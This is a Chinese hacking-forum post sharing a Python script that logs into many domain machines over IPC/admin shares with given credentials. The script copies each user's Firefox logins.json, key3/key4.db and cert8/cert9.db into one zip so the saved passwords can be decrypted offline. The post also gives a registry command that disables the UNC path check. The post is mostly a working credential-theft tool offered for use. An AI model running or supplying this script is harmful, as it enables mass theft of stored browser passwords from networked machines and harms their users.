搜索
    Hi~登录注册
    查看: 148|回复: 0
    收起左侧

    批量IPC获取域内机器Firefox密码

    [复制链接]

    38

    主题

    4

    精华

    27 小时

    在线时间

    密圈

    积分
    156
    发表于 2019-9-14 21:55:08 | 显示全部楼层 |阅读模式
    渗透测试中,获取机器浏览器密码是一项必不可少的工作,

    但考虑在域环境下,机器数量多,一台台获取显然效率不够,于是用py写了个自动化脚本。

    解密条件



    [AppleScript] 纯文本查看 复制代码
    低版本firefox:logins.json、key3.db、cert8.db
    高版本firefox:logins.json、key4.db、cert9.db
    其中logins.json是关键,没有它则获取不到浏览器密码
    

    示例代码
    [Python] 纯文本查看 复制代码
    import os,sys
    from threading import Thread
    import zipfile
    
    user = sys.argv[1]
    pwd = sys.argv[2]
    file_open=('C:\\Users\\public\\downloads\\host.txt')
    def file_name():
    	for host in open(file_open):
    		host = host.strip('\n')
    		os.system("net use \\\\%s %s /user:%s"%(host,pwd,user))
    		for root, dirs, files in os.walk('\\\\%s\\c$\\users'%host):
    			try:
    				for files in files:
    					if files == 'logins.json':
    						os.chdir(root)
    						print (root+"\\"+'logins.json')
    						os.system("copy %s\\logins.json c:\\users\\public\\downloads\\logins.json%s"%(root,host))
    						os.system("copy %s\\key3.db c:\\users\\public\\downloads\\key3.db%s"%(root,host))
    						os.system("copy %s\\cert8.db c:\\users\\public\\downloads\\cert8.db%s"%(root,host))
    						os.system("copy %s\\key4.db c:\\users\\public\\downloads\\key4.db%s"%(root,host))
    						os.system("copy %s\\cert9.db c:\\users\\public\\downloads\\cert9.db%s"%(root,host))
    						os.system("net use \\\\%s /del"%host)
    			except:
    				pass
    			finally:
    				zipDir('C:\\Users\\public\\downloads','C:\\Users\\public\\Documents\\key.zip')
    
    def zipDir(dirpath,outFullName):
        zip = zipfile.ZipFile(outFullName,"w",zipfile.ZIP_DEFLATED)
        for root, dirs, files in os.walk(dirpath):
        	fpath = root.replace(dirpath,'')
            for files in files:
                zip.write(os.path.join(root,files),os.path.join(fpath,files))
        zip.close()
    
    t=Thread(target=file_name)
    t.start()



    报错原因:网络路径下的问题。解决方法:

    [AppleScript] 纯文本查看 复制代码
    reg add "hkey_current_user\software\microsoft\command processor" /v "disableunccheck" /t "reg_dword" /d "1" /f

    报错问题不大,并不影响使用。
    效果

    2.gif


    破解

    3.gif





    上一篇:分享个过狗、360网站卫士、JSP Webshell
    下一篇:Telegram 在修复隐私漏洞后发布新版本
    回复

    使用道具 举报

    游客
    回复
    您需要登录后才可以回帖 登录 | 获取账号

    快速回复 返回顶部 返回列表